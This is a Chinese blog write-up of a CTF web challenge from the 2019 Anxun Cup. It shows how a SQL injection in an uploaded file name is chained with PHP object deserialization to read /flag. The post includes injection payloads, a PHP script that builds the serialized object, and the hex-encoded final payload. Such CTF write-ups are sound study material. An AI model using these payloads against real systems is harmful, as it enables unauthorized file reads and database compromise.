[安洵杯 2019]不是文件上传

最新推荐文章于 2023-02-22 14:17:51 发布
最新推荐文章于 2023-02-22 14:17:51 发布
阅读量300 收藏
点赞数 2
分类专栏: SQL注入 序列化和反序列化 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/115673851
版权

知识点

  • SQL注入

WP

进入环境,有一个upload.php可以传文件,有一个show.php可以查看上传的列表,发现有点像是存入了数据库,再考虑到以前似乎听说过文件上传中文件名的SQL注入,就猜测这题应该其实是一个SQL注入。在filename那里尝试了一下,一开始是1.png可以,1.png'提示我必须上传图片,再考虑到show.php那里的回显,文件名是被加密的,因此猜测后端可能是把.png前面的东西单独的处理,存入了数据库,于是这样:1'.php,果然报wrong了,再试试1'or'1.php,又上传成功了,因此这里存在SQL注入,而且肯定是insert注入了。
经过尝试,发现后面是5列:
1',2,3,4,5);#.png
在这里插入图片描述
在这里插入图片描述
2和4那里可以回显,然后进行SQL注入,然后。。。就没然后了,写不了马读不了文件,flag也不在库里,卡住了。

看了一下WP,原来首页可以继续往下拉,有这个:
在这里插入图片描述
去github上查wowouploadimage,得到源码:
在这里插入图片描述
把源码下载下来,大致审一下,发现其实逻辑和我之前猜测的都差不多,只不过是helper.php中还有这个:

	public function view_files($path){
		if ($this->ifview == False){
			return False;
			//The function is not yet perfect, it is not open yet.
		}
		$content = file_get_contents($path);
		echo $content;
	}

	function __destruct(){
		# Read some config html
		$this->view_files($this->config);
	}

而图片表的attr列,原来是存储了序列化信息的:

		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
		$array["attr"] = serialize($my_ext);

在show.php里面:

	public function Get_All_Images(){
		$sql = "SELECT * FROM images";
		$result = mysqli_query($this->con, $sql);
		if ($result->num_rows > 0){
		    while($row = $result->fetch_assoc()){
		    	if($row["attr"]){
		    		$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
					$attr = unserialize($attr_temp);
				}
		        echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";
		    }
		}else{
		    echo "<p>You have not uploaded an image yet.</p>";
		}
		mysqli_close($this->con);
	}

取数据,然后注意:$attr = unserialize($attr_temp);,因此既然可以SQL注入了,直接构造反序列化,进行反序列化攻击了。
构造出的字符串直接弄不上去,因为文件名中不能有单引号。我拿python脚本也传部上去,看了WP是改成十六进制,日了我太菜了忘记了这茬。

<?php
class helper {
    protected $ifview = True;
    protected $config = "/flag";
}
echo bin2hex(serialize(new helper()));

filename="1',2,3,4,0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png"

再访问show.php即可得到flag。主要还是学习了文件上传中还能有SQL注入。

bfengj
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安洵RE(PE_Debug)
11-29
安洵RE(PE_Debug) 拿到题目名字已给出提示PE结构OD打开查看一下字符串
[安洵 2019]不是文件上传(文件名不能用“,数据库可识别hex编码)
qq_62046696的博客
01-04 410
然后看到了file_get_contents可以读flag,所以$path=/flag,为什么是这个呢,是因为基本上的题目flag都在根目录如果不对可以再继续尝试,然后前提是ifview为true.数组变成了:O:6:"helper":2:{s:9:"\0\0\0ifview";打开题目尝试上传文件发现只能上传图片,然后看见了图片的路径,但是图片码连不上蚁键,结合题目,然后看到了题目给出的github源码。本来我是没相通为什么,后面序列化的需要hex编码,后来突然懂了,是因为双引号被禁用。
[安洵 2019]不是文件上传 文件上传的注入
qq_54929891的博客
05-07 517
进入题目传了一个jpg图片上去 发现文件名被重命名了,但是给了我们一个path路径(难道就是一个绕过题?这么轻松就会告诉你路径,跟题目有点不符) 啪啪打脸,各个地方抓一下包show.php,upload.php以及show.php?delete_all=true,按照经验我们应该在某个地方是可以获取到这些源码的,但是我这里找了很久根本找不到……,只能再一次求助别人的wp…… 没想到的是!!! 根据这条信息去github找这个出题人 获得源码,好好代码审计了(不愧是锻炼搜索能力,..
i-SOON_CTF_2018:2018第一届安洵过渡环境源码WP
03-24
AXB-CTF 2018第一届安洵过渡环境/原始码
i-SOON_CTF_2019:2019第二届安洵过渡环境
03-09
i-SOON_CTF_2019 2019第二届安洵部分过渡环境/源码 收集分类为大型/大型CTF比赛赛题,提供容器化专属翻译环境。 如有争议,或转型问题请电联
17黄锦洵 毕业论文.zip
09-13
17黄锦洵 毕业论文.zip
17黄锦洵 毕业论文任务书.zip
09-13
17黄锦洵 毕业论文任务书.zip
BUUCTF:[安洵 2019]不是文件上传
末初的CSDN博客
03-28 1927
这题和攻防世界XCTF:upload有点像,看似上传却都不是上传是上传图片的文件名注入 参考:安洵2019 官方Writeup 获取源码 在网站首页存在一些信息 在gihtub找得到源码 BUU也给出了这题的源码 漏洞分析 在图片上传处,check函数并未对文件名(title)进行检测, 直接传递到最后的SQL语句当中。导致了SQL注入,并且属于Insert注入。 审计代码后可知,图片...
[安洵 2019]不是文件上传 sql注入 发序列化 信息泄漏
a3320315的博客
01-30 2008
题目描述 找了半天也没找到题目的关键点·~~ 看了writeup才知道有个信息泄露 然后在github上下载源码就可以了~~ 解题过程 首先我们拿到一套源码,先找到哪段代码能够读取flag~~ 在helper.php中有一段代码,可以读取文件~~,很明显的反序列化~~ 然后我们在文中找一下序列化和反序列化的点~~ 大概说明一下代码的意思,我们上传图片时,会序列化图片的宽高,然后在show.php中...
第二届安洵2019部分writeup
Sea_Sand息禅
12-01 5993
Misc 吹着⻉斯扫⼆维码 这个就有点过分了,36张碎片,手动拼二维码 先是爆破出了压缩包的密码,解出来flag.txt里面有点乱码,显然还需要操作,可能就跟二维码有关了,二维码扫出来的结果是: BASE Family Bucket ??? 85->64->85->13->16->32 下面就需要把flag.txt中的内容进行base的这一系列的解码了,但是这个1...
[安洵 2019]不是文件上传1
m0_62129839的博客
02-22 135
又因为上传的文件名中不能有双引号,所以将payload进行16进制编码,别忘了前面加上0x。这道题首先给了源码,但是我没看到,进了页面,他储存的文件并不保存在他数据库,也不像是sql注入,所以扫描文件,拿到源码,审计。第一个可疑的地方是show.php里面的$attr变量,这里有一个反序列化。最后用#注释掉’value2’,‘value3’,…我审计的时候没看到,wp告诉我的,实际上这个位置很明显。三行字信息量巨大,全是我不会的小细节。php序列化代码,抄wp的。的图片,查看,得到flag。
buuCTF [安洵 2019]不是文件上传 1
weixin_45642610的博客
08-06 458
buuCTF [安洵 2019]不是文件上传 1 这题给了源码,buuctf上直接给了。GitHub上搜索wowouploadimage也搜得到 三个文件 upload.php <!DOCTYPE html> <html> <head> <title>Image Upload</title> <link rel="stylesheet" href="./style.css"> <meta http-equiv="cont
BUUCTF:[安洵 2019]不是文件上传 -- sql注入,PHP反序列化,sql16进制 单引号问题,
Zero_Adam的博客
04-04 364
目录:一、自己看着源码+WP复现 一、自己看着源码+WP复现 这周写了个上传下载文件的网站后,再做这种 文件上传相关的题目时就轻松多了,,至少代码是干什么的能看明白了, 其实数据库的键值是什么也看了有一会儿才看出来,然后才在本地复现的。 create database pic_base create table images( title varchar(100), filename varchar(100), ext varchar(100), path varchar(200), attr varch
[安洵 2019]easy_serialize_php 1
最新发布
03-16
这是一道 PHP 序列化题目,需要我们对 PHP 的序列化机制有一定的了解。 题目给出了一个序列化后的字符串,我们需要将其反序列化成 PHP 对象,并修改其中的某个... 具体的操作步骤可以参考以下代码: ... class User { ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值